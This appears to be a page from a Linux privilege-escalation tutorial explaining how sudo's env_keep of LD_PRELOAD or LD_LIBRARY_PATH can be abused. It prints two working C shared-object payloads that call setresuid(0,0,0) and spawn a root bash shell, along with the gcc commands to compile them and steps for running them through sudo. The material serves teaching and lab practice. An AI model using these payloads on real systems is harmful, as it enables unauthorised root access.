> For the complete documentation index, see [llms.txt](https://rudrasec0x01.gitbook.io/linux-privesc/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://rudrasec0x01.gitbook.io/linux-privesc/environment-variables.md).

# Environment Variables

Programs running via sudo can inherit variables from the environment of the user. If the **env\_reset** option is set in the **/etc/sudoers** config file, sudo will run the programs in a new, minimal *environment*. The **env\_keep** option can be used to keep certain environment variables from the user’s environment. The configured options are displayed when running **sudo -l**.

<figure><img src="https://atom.hackstreetboys.ph/content/images/2020/06/Screen-Shot-2020-06-10-at-3.22.16-PM.png" alt=""><figcaption></figcaption></figure>

The **LD\_PRELOAD** and **LD\_LIBRARY\_PATH** are both inherited from the user's environment.

### LD\_PRELOAD <a href="#ld_preload" id="ld_preload"></a>

When a program is running, **LD\_PRELOAD** loads a shared object before any others. By writing a simple script with init() function, it will help us execute code as soon as the object is loaded.

First, create a shared object file with the following contents:

```
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
        unsetenv("LD_PRELOAD");
        setresuid(0,0,0);
        system("/bin/bash -p");
}
```

Then, compile the script.

```
gcc -fPIC -shared -nostartfiles -o /tmp/preload.so /home/user/tools/sudo/preload.c
```

And finally, run one of the programs you are allowed to run via sudo while setting the LD\_PRELOAD environment variable to the full path of the new shared object:

<figure><img src="https://atom.hackstreetboys.ph/content/images/2020/06/Screen-Shot-2020-06-10-at-3.37.55-PM.png" alt=""><figcaption></figcaption></figure>

***

### LD\_LIBRARY\_PATH <a href="#ld_library_path" id="ld_library_path"></a>

The **LD\_LIBRARY\_PATH** contains a list of directories which search for shared libraries first.

First, print the shared libraries of a program.

<figure><img src="https://atom.hackstreetboys.ph/content/images/2020/06/Screen-Shot-2020-06-10-at-3.40.46-PM.png" alt=""><figcaption></figcaption></figure>

Use one of the shared objects in the list and we will hijack it by creating a file with same name. For this demonstration, we will be targeting the libcrypt.so.1 file.

```
#include <stdio.h>
#include <stdlib.h>

static void hijack() __attribute__((constructor));

void hijack() {
        unsetenv("LD_LIBRARY_PATH");
        setresuid(0,0,0);
        system("/bin/bash -p");
}
```

Then, compile the script.

```
gcc -o /tmp/libcrypt.so.1 -shared -fPIC /home/user/tools/sudo/library_path.c
```

And finally, run apache2 using sudo, while settings the LD\_LIBRARY\_PATH environment variable to /tmp (where compiled shared object is located):

<figure><img src="https://atom.hackstreetboys.ph/content/images/2020/06/Screen-Shot-2020-06-10-at-3.46.01-PM.png" alt=""><figcaption></figcaption></figure>
